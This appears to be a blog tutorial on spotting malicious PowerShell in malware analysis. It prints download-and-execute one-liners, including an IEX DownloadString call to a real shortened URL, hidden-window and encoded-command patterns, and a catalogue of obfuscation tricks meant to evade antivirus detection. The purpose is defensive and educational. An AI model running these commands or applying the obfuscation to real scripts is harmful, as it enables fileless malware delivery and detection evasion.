# Powershell 101 in Malware Analysis

PowerShell attacks are currently the popular weapon of alternative for several of those attacks as a result of it provides variety of techniques for bypassing existing security. Not least of all, the flexibility to run directly in memory and remotely download payloads gave a lot of benefits to attacker.

Let’s learn a little bit about Powershell malicious command line.

powershell -nop -noe -Command IEX (New-Object System.Net.WebClient).DownloadString('https://tinyurl.com/y5nupk4e')


Powershell command that are use to download “something” can be consider as a high potentially of a malicious attack. The command above indicate that the command is run to download strings (payload) at URL https://tinyurl.com/y5nupk4e. A goodware will never do such a thing to download their file using powershell command.

# Lower and upper case letters

Powershell -ExecUTIONPoLICy BypASs -wiNDoWSTYLe hidDeN(NEW-objecT.SYstEM.NET.wEbCLIeNt).DOWnLoADFiLE(<removed>);


This pattern of powershell is using alternating lower and upper case letters to execute their command. It’s a high potentially of a malicious command when it come with this pattern.

# Using short flags

Powershell -nop -w hidden -e <encoded text>
Powershell -nop -w hidden -e <ps1 file>


Sometimes, this pattern of command uses by goodwares to does their job backgroundly. If the command included a long encoded text, I can 100% sure that those command is a malicious. Legit software will never use encoded text to execute it’s job.

For .ps1 part, recognizing the location of the ps1 file and its name can help us to determine it’s a malicious or not. If you can get the hash of the .ps1, drop it into Google/Virustotal/Sandbox to futher investigation.

Short flags reference:

Parameters short parameters
-Command -c
-EncodedArguments -ea, -encodeda
-EncodedCommand -e, -ec, -enc
-ExecutionPolicy -ex, -ep
-File -f
-Help -h,-? or /h,/?
-InputFormat -i, -if
-NoExit -noe
-NoLogo -nol
-NoProfile -nop
-NonInteractive -noni
-OutputFormat -o, -of
-Sta -s
-WindowStyle -w

Also this picture explained it all:

# Using encoded commands

Powershell -EncodedCommand SQBmACgAJABQAFMAVgB
Powershell -e SQBmACgAJABQAFMAVgB
Powershell -enc SQBmACgAJABQAFMAVgB


The -encodedcommand is long version of -e parameter. They both does a same job where is the function of this parameter is to execute encoded command.

# Invoke expression

Powershell -Invoke-Expression (("New-Object Net.WebClient")).(’Downloadfile.ps1’)


Invoke-Expression or IEX cmdlet evaluates or runs a specified string as a command. So, anything after Invoke-Expression will be assume as command execution.

# Using ”[char]” instead of a character

Powershell ... $cs = [char]71;$fn = $env:temp+$cs; ...


Malware often usen “[char]” to replace with character to evade or bypass AV. Also this type of command pattern often used to slow malware analyst’s investigation progress.

IEX $s=New-Object IO.MemoryStream([Convert]::FromBase64String(’<removed>’));  Base64 encoding often used in malware payload. # Using UTF8 encoding $f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(<removed>’));


powershell iex $env:vruuyg  Example of usage: If we look into properties’s envinronment, we can see that the variable pajsj has value of the command execution. # and many more… We need to consider these command-line arguments, such as: ExecutionPolicy Bypass, -Exec Bypass, -ep bypass, -EncodedCommand, -enc -NonInteractive, -NonI, -NoLogo, -NoProfile, -NoP, -WindowStyle Hidden, -w Hidden  Example of powershell obfuscation: 3 layer obfuscation: A code snapshot of macro malware that uses “^” for command shell obfuscation Another complex obfuscation in malware wild. and many more. # Short note on obfuscation • The URL is just a string, so can be concatenated and written in other ways such as “h” + “ttp”. Additional string obfuscation techniques are covered below. • System is optional in PowerShell type names, so System.Net.WebClient can be written as Net.WebClient • PowerShell can use either single or double quotes in strings. Whitespace can be added almost anywhere, so DownloadString(‘ could just as easily be written as DownloadString( “ • The WebClient class offers many methods to download content in addition to DownloadString, such as DownloadFile, DownloadData, and OpenReadAsync • Method names such as DownloadString can be included in quotes and have escape characters included to create a syntax like  System.Net.WebClient).”DownloadString”  Because it can be treated as a string, string-based obfuscation techniques such as concatenation and reordering can also be used on the method name. • Similar to method names, the Net.WebClient argument to New-Object can be obfuscated with escape characters, string-based obfuscation techniques, and concatenation across multiple variables. That can produce a result like: $var1="Net.";
$var2="WebClient"; (New-Object$var1$var2)  • PowerShell command names often have aliases. For example, Invoke-Expression can also be referred to as iex. • Even when commands do not have aliases, the Get-Command command lets a script author query the PowerShell command list and invoke the result. This query can include wildcards, so invoking New-Object can look like this: & (Get-Command *w-O*). The invocation (&) operator in this example has an alternative, which is the dot (.) operator. The Get-Command cmdlet has an alias and can be dynamically invoked similarly, so is not safe to key on. • In addition to Get-Command as a mechanism to query command names, PowerShell offers several API-style methods to query command names – such as $executionContext.InvokeCommand.GetCommand().
• The invocation (& and .) operators support string arguments. These can be easily obscured using obfuscation techniques such as string concatenation and string reordering.
• Detection of Invoke-Expression suffers from the same challenges of command obfuscation that New-Object and Get-Command suffer from. It is also popular in non-malicious contexts, making false positives based on this indicator a significant challenge.
• Invoke-Expression is not the only cmdlet or technique that can be used to invoke dynamicallygenerated code. Other alternatives are Invoke-Command, Script Block invocation (such as & [Scriptblock]::Create("Write-Host Script Block Conversion") ), and dynamic script invocation APIs such as $ExecutionContext.InvokeCommand.InvokeScript("Write-Host EXPRESSION"). # String obfuscation Anything that allows a string as an argument can be obfuscated using string obfuscation techniques. • String concatenation is a common way to break up identifiable strings. If a signature is written for the term, “http”, it can also be written as “h” + “ttp”. The most common form of concatenation is the ‘+’ operator, but PowerShell’s –join operator can also be used. In addition to PowerShell techniques, the String.Join() and String.Concat() methods from .NET can accomplish the same goals. • PowerShell’s –f string formatting operator, based on the C# String.Format method, can create strings at runtime. The format operator uses format tokens like {0} and {1} to identify the order of replacement strings, so obfuscating the invocation of New-Object might look like this with format operator obfuscation applied: & ("{1}{0}{2}" -f 'wOb','Ne','ject'). • Strings can be reversed through several mechanisms, such as PowerShell’s array slicing operator (-join "detacsufbO"[9..0]), Array.Reverse ($a = [char[]]"detacsufbO"; [Array]::Reverse($a); -join$a), reverse regular expression matching (-join [RegEx]::Matches("detacsufbO",'.','RightToLeft')), and others.
• Strings can be split by an arbitrary delimiter, and then rejoined: -join ("Obf~~usc~~ated" -split "~~")
• Through the –replace operator or the String.Replace() method, strings can be replaced either to remove delimiters, or change the meaning of a string: "System.SafeClass" -replace "Safe","Unsafe"

ref:

1. https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf
2. Research Paper “Detecting Malicious PowerShell Commands using Deep Neural Networks” by Danny Hendler, Shay Kels and Amir Rubin.
3. https://www.trendmicro.com/vinfo/pl/security/news/security-technology/security-101-the-rise-of-fileless-threats-that-abuse-powershell
4. https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf